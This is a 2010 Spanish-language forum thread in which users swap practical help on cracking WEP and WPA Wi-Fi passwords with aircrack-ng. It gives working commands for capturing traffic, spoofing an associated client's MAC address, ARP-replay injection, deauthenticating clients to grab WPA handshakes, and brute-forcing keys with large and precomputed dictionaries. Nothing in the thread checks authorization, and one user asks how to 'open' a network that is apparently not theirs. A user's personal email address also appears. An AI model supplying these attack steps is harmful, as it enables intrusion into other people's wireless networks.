Problema de autentificacion

Monik84 · 25-feb-2010, 02:10

Buenas, sigo todos los pasos de los manuales de Aircrack y me topo con el problema clasico de autentificacion que envia sin parar...

aireplay-ng -1 6000 -o 1 -q 10 -e WLAN_56 -a E0:91:53:08:B1:E0 -h 00:23:4D:8D:37:3C wlan0

02:52:25 Waiting for beacon frame (BSSID: E0:91:53:08:B1:E0) on channel 6

02:52:25 Sending Authentication Request (Open System) [ACK]

02:52:27 Sending Authentication Request (Open System) [ACK]

02:52:29 Sending Authentication Request (Open System) [ACK]

02:52:31 Sending Authentication Request (Open System) [ACK]

02:52:33 Sending Authentication Request (Open System) [ACK]

02:52:35 Sending Authentication Request (Open System) [ACK]

02:52:37 Sending Authentication Request (Open System) [ACK]

02:52:39 Sending Authentication Request (Open System) [ACK]

02:52:41 Sending Authentication Request (Open System) [ACK]

02:52:43 Sending Authentication Request (Open System) [ACK]

02:52:45 Sending Authentication Request (Open System) [ACK]

02:52:47 Sending Authentication Request (Open System) [ACK]

02:52:49 Sending Authentication Request (Open System) [ACK]

02:52:51 Sending Authentication Request (Open System) [ACK]

02:52:53 Sending Authentication Request (Open System) [ACK]

02:52:55 Sending Authentication Request (Open System) [ACK]
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.

Uso una Intel Wifi Link 5100,el test me va bien...el router no tiene filtros mac, estoy cerca de el,la tarjeta esta en el mismo canal, ya puse el driver supuestamente correcto, corrobore el bssid,a,h,etc.
Alguien podria decirme que mas puedo intentar?, es una wep miserable de 64 bits.
Gracias,saludos.

zero · 25-feb-2010, 03:12

Es un problema frecuente en esa tarjeta,inyecta bien pero la asociacion con aireplay es otra historia,se ha conseguido lograr la asociación de varias formas,ahí van dos:

No se que versión del kernel tienes pero con wifiway lo han arreglado actualizando el kernel al 2.6.28.

Y la otra es creando un fichero con wpa_supplicant con los datos de la red ESSID,BSSID,etc...para luego utilizarlo.Esto solo es para asociarte luego sigues los pasos normalmente con aireplay-ng.

Mira aquí tienes el manual con las dos posibilidades que te digo:

Intel(R) Wireless Wifi Link 5100 y Wifiway 1.0 Final

Por otro lado,en relación a esto que me decías:

Cita:

no debo asociarme para conseguir tanto una wep como una wpa-psk

Para las wpa no es necesario asociarse solo empiezas a capturar tráfico con airodump-ng,y mandas el ataque de desautenticación para desconectar al cliente asociado,y la conectarse de nuevo tu capturas el handshake(sino hay cliente no hay handshake).

Y lo que te decía de las wep es que sino hay cliente pues tienes que asociarte para que el router no rechace los paquetes,pero si ya hay un cliente asociado pues utilizas tu su MAC para inyectar puesto que esa MAC ya esta asociada al AP.
Por ejemplo suponiendo que haya un cliente asociado,imaginemos que tu interfaz es wlan0:

1.Lanzas airodump-ng para ver las redes:

Código:

airodump-ng wlan0

Para escanear no hace falta que esté en modo monitor,escoges la red a editar,con Ctrl+c paras de escanear y dejas esa ventana ahí,para coger los datos que necesitas,supongamos que estos son los datos de la red:
Channel:6
BSSID:00:26:58:66:96:78
STATION:00:15:78:65:66:45 (mac del cliente)

y ahora cambias tu MAC por la del cliente que hay asociado,por ejemplo.

Código:

ifconfig wlan0 down
macchanger -m 00:15:78:65:66:45 wlan0
ifconfig wlan0 up

Y ahora la pones en modo monitor,le bajas el rate a 1M y la pones en el canal de AP:

Código:

iwconfig wlan0 rate 1M channel 6 mode monitor

Lanzas airodump-ng para empezar a capturar tráfico :

Código:

airodump-ng -c 6 --bssid 00:26:58:66:96:78 -w captura  wlan0

Y lanzas el ataque 3,con tu nueva mac,osea la del cliente:

aireplay-ng -3 -b 00:26:58:66:96:78 -h 00:15:78:65:66:45 wlan0

Y deberían empezar a subir los IVs,en la columna que pone data,aunque a veces tarda...paciencia.
Este es un ejemplo muy resumido de como utilizar la mac de un cliente,y así no tener que asociarte y asegurarte que el router aceptará la MAC y los paquetes,lo cual te viene muy bien por lo especial que es tu tarjeta para el tema de la asociación.

Si no hubiera clientes pues tendrías que asociarte primero.
De todas formas echale un buen vistazo al enlace que te he puesto ahí que creo que te será de mucha ayuda para tu tarjeta en cuestión.

Monik84 · 03-mar-2010, 21:20

Hola Zero, gracias por tu ayuda, he logrado crackear la wep de mi router y conseguir un handshake de wpa, no hice lo de wpa supplicant porque me parece demasiado complicado y no encontre un buen tutorial (ni en esta web ni en la de aircrack oficial) para novatas.
El problema con las wep es que ahora no me inyecta y se asocia, se que se asocia porque aparece en el airodump asociado e hice el test de tcpdump, pero lo que me has dicho de DATA (ivs) se queda en cero a excepcion de cuando logre crackear mi wep por primera vez, la inyeccion pareceria ir bien,no tira errores pero los ARP no pasan de cero tampoco.
Con respecto a la WPA, he bajado mas de una decena de diccionarios y ninguno encaja,hago aircrack-ng -w diccionario *.cap en el directorio q solo se alojan .cap de esta "sesion de practica".Me encanto en cambio como crackeo en segundos la WEP con el parametro -z y sin diccionarios, no hay algo parecido para wpa?.
Te agradezco nuevamente, saludos.

zero · 04-mar-2010, 00:55

Cita:

El problema con las wep es que ahora no me inyecta y se asocia, se que se asocia porque aparece en el airodump asociado e hice el test de tcpdump, pero lo que me has dicho de DATA (ivs) se queda en cero a excepcion de cuando logre crackear mi wep por primera vez, la inyeccion pareceria ir bien,no tira errores pero los ARP no pasan de cero tampoco

No te preocupes esas cosas pasan esto no es una ciencia exacta,a veces muchos routers no sueltan un triste paquete,intenta otros tipos de ataques,en vez del ataque 3,después de asociarte,utiliza el ataque 2:

ATAQUE 2: REENVIO INTERACTTIVO DE PAQUETES (Backtrack+Aircrack+RTL 8187L)

Si se queda leyendo paquetes y no selecciona ninguno pues mala suerte...tiene que seleccionar un paquete y preguntarte si lo quieres utilizar,pulsas y y empieza la inyeccion.

Cita:

Con respecto a la WPA, he bajado mas de una decena de diccionarios y ninguno encaja,hago aircrack-ng -w diccionario *.cap en el directorio q solo se alojan .cap de esta "sesion de practica".Me encanto en cambio como crackeo en segundos la WEP con el parametro -z y sin diccionarios, no hay algo parecido para wpa?.

Cuando dices no encaja a que te refieres?
A que te dice que no encuentra el diccionario,o que ya le pasaste todos y no encontró la clave?

Monik84 · 04-mar-2010, 21:02

Hola Zero, gracias de nuevo, desde que me registre en este foro no has dejado de ayudarme con gran paciencia.
Esta noche intentare lo del ataque 2, sobre las wpa, los diccionario no logran revelar la clave,si detecta los diccionarios y busca pero no da con la clave, igual seguire bajando mas diccionarios.
Gracias, saludos.

zero · 04-mar-2010, 21:57

Cita:

Iniciado por Monik84

Hola Zero, gracias de nuevo, desde que me registre en este foro no has dejado de ayudarme con gran paciencia.
Esta noche intentare lo del ataque 2, sobre las wpa, los diccionario no logran revelar la clave,si detecta los diccionarios y busca pero no da con la clave, igual seguire bajando mas diccionarios.
Gracias, saludos.

De nada,siempre es un placer poder ayudar,con las wpa,PACIENCIA
aquí tienes un enlace con diccionarios:

Diccionarios WPA

Monik84 · 04-mar-2010, 23:44

Gracias por los diccionarios, estoy usando ahora mismo el de 227 millones de palabras (aunque el password es una combinacion de numeros y letras).
Has usado el wifi decripter?, con ese en este momento estoy generando un diccionario para WPA, combinacion de numeros y letras de hasta 8 caracteres (estara bien 8?) ...parece buena herramienta,solo que me dice que tardara 16.000 dias en crear el diccionario...jajaja.

zero · 05-mar-2010, 04:10

Cita:

Iniciado por Monik84

Gracias por los diccionarios, estoy usando ahora mismo el de 227 millones de palabras (aunque el password es una combinacion de numeros y letras).
Has usado el wifi decripter?, con ese en este momento estoy generando un diccionario para WPA, combinacion de numeros y letras de hasta 8 caracteres (estara bien 8?) ...parece buena herramienta,solo que me dice que tardara 16.000 dias en crear el diccionario...jajaja.

El de 227 millones de palabras tiene unos dos gigas mi pc es intel core duo y tardo 10 horas en pasar ese diccionario,así que ten cuidado con los diccionarios muy pesados que el ordenador lo sufre bastante,déjalo descansar de vez en cuando.Yo no usé el wifidecrypter,no te puedo decir,pero si vas a crear diccionarios uno de 8 caracteres te puede tardar en pasarlo unos 5 días miralo tu misma : Online Password Calculator

Lo ideal es crear diccionarios precomputados porque aumenta mucho el número de claves por segundo:

Diccionarios WPA+PSK:Cowpatty

Bueno me voy de finde no tendré internet,ya me contarás el Lunes como te fué.

PD:Indaga en el tema de precomputar diccionarios.

Saludos

ZERO

jiro843 · 23-mar-2010, 17:04

halo tengo un problema con la autentificacion y la asociacion con el aircrack cuando
el nombre de la red tiene espacios o algun caracter simbolico por ejemplo juancarlos etiopia
con el simple echo de tener un espacio no puedo asociar la red inalambrica que puedo hacer para poder abrirla y de ahi poder inyectar me gustaria que me ayudaras te dejo mi correo
jarib_espejel@hotmail.com

zero · 23-mar-2010, 18:23

Cita:

Iniciado por jiro843

halo tengo un problema con la autentificacion y la asociacion con el aircrack cuando
el nombre de la red tiene espacios o algun caracter simbolico por ejemplo juancarlos etiopia
con el simple echo de tener un espacio no puedo asociar la red inalambrica que puedo hacer para poder abrirla y de ahi poder inyectar me gustaria que me ayudaras te dejo mi correo
jarib_espejel@hotmail.com

La solución es muy fácil, solo hay que poner el ESSID entre comillas (las de la tecla con numero el 2)

Por ejemplo

Código:

aireplay-ng -1 30 -e "juancarlos etiopia" -a 00:12:58:69:36:56 -h 00:11:22:33:44:55 wlan0

PD:Con postear la duda una vez habría sido suficiente